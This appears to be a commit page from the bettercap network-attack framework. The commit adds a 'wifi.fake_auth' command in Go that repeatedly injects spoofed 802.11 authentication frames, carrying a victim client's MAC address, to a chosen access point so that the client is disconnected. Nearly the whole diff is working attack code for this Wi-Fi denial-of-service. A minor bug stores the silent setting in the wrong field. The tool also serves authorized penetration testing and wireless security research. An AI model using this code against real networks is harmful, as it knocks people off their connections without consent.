add wifi fake authentication attack

bettercap · Jul 23, 2021 · ef2cd00 · ef2cd00
1 parent c8ecaf9
commit ef2cd00
Show file tree

Hide file tree

Showing 2 changed files with 95 additions and 0 deletions.
diff --git a/modules/wifi/wifi.go b/modules/wifi/wifi.go
@@ -55,6 +55,7 @@ type WiFiModule struct {
 	assocOpen           bool
 	assocAcquired       bool
 	csaSilent           bool
+	fakeAuthSilent      bool
 	filterProbeSTA      *regexp.Regexp
 	filterProbeAP       *regexp.Regexp
 	apRunning           bool
@@ -90,6 +91,7 @@ func NewWiFiModule(s *session.Session) *WiFiModule {
 		assocOpen:       false,
 		assocAcquired:   false,
 		csaSilent:       false,
+		fakeAuthSilent:	 false,
 		showManuf:       false,
 		shakesAggregate: true,
 		writes:          &sync.WaitGroup{},
@@ -235,10 +237,32 @@ func NewWiFiModule(s *session.Session) *WiFiModule {
 
 	mod.AddHandler(channelSwitchAnnounce)
 
+	fakeAuth := session.NewModuleHandler("wifi.fake_auth bssid client", `wifi\.fake_auth ((?:[a-fA-F0-9:]{11,}))\s+((?:[a-fA-F0-9:]{11,}))`,
+		"send an fake authentication with client mac to ap lead to client disconnect",
+		func(args []string) error {
+			bssid, err := net.ParseMAC(args[0])
+			if err != nil {
+				return err
+			}
+			client,err:=net.ParseMAC(args[1])
+			if err!=nil{
+				return err
+			}
+			return mod.startFakeAuth(bssid,client)
+		})
+
+	fakeAuth.Complete("wifi.fake_auth", s.WiFiCompleterFull)
+
+	mod.AddHandler(fakeAuth)
+
 	mod.AddParam(session.NewBoolParameter("wifi.channel_switch_announce.silent",
 		"false",
 		"If true, messages from wifi.channel_switch_announce will be suppressed."))
 
+	mod.AddParam(session.NewBoolParameter("wifi.fake_auth.silent",
+		"false",
+		"If true, messages from wifi.fake_auth will be suppressed."))
+
 	mod.AddParam(session.NewStringParameter("wifi.deauth.skip",
 		"",
 		"",

diff --git a/modules/wifi/wifi_fake_auth.go b/modules/wifi/wifi_fake_auth.go
@@ -0,0 +1,71 @@
+package wifi
+
+import (
+	"bytes"
+	"fmt"
+	"github.com/bettercap/bettercap/network"
+	"github.com/bettercap/bettercap/packets"
+	"net"
+)
+
+
+func (mod *WiFiModule) isFakeAuthSilent() bool {
+	if err, is := mod.BoolParam("wifi.fake_auth.silent"); err != nil {
+		mod.Warning("%v", err)
+	} else {
+		mod.csaSilent = is
+	}
+	return mod.csaSilent
+}
+
+func(mod *WiFiModule)sendFakeAuthPacket(bssid,client net.HardwareAddr){
+	err,pkt:=packets.NewDot11Auth(client,bssid,0)
+	if err!=nil{
+		mod.Error("could not create authentication packet: %s", err)
+		return
+	}
+	for i:=0;i<32;i++{
+		mod.injectPacket(pkt)
+	}
+}
+
+func (mod *WiFiModule) startFakeAuth(bssid,client net.HardwareAddr) error {
+	// if not already running, temporarily enable the pcap handle
+	// for packet injection
+	if !mod.Running() {
+		if err := mod.Configure(); err != nil {
+			return err
+		}
+		defer mod.handle.Close()
+	}
+
+	var ap *network.AccessPoint = nil
+
+	for _, _ap := range mod.Session.WiFi.List() {
+		if bytes.Equal(_ap.HW, bssid) {
+			ap = _ap
+		}
+	}
+
+	if ap == nil {
+		return fmt.Errorf("%s is an unknown BSSID", bssid.String())
+	}
+
+	mod.writes.Add(1)
+	go func() {
+		defer mod.writes.Done()
+
+		if mod.Running() {
+			logger := mod.Info
+			if mod.isFakeAuthSilent() {
+				logger = mod.Debug
+			}
+			logger("fake authentication attack in AP: %s client: %s", ap.ESSID(), client.String())
+			// send the beacon frame with channel switch announce element id
+			mod.onChannel(ap.Channel, func() {
+				mod.sendFakeAuthPacket(bssid,client)
+			})
+		}
+	}()
+	return nil
+}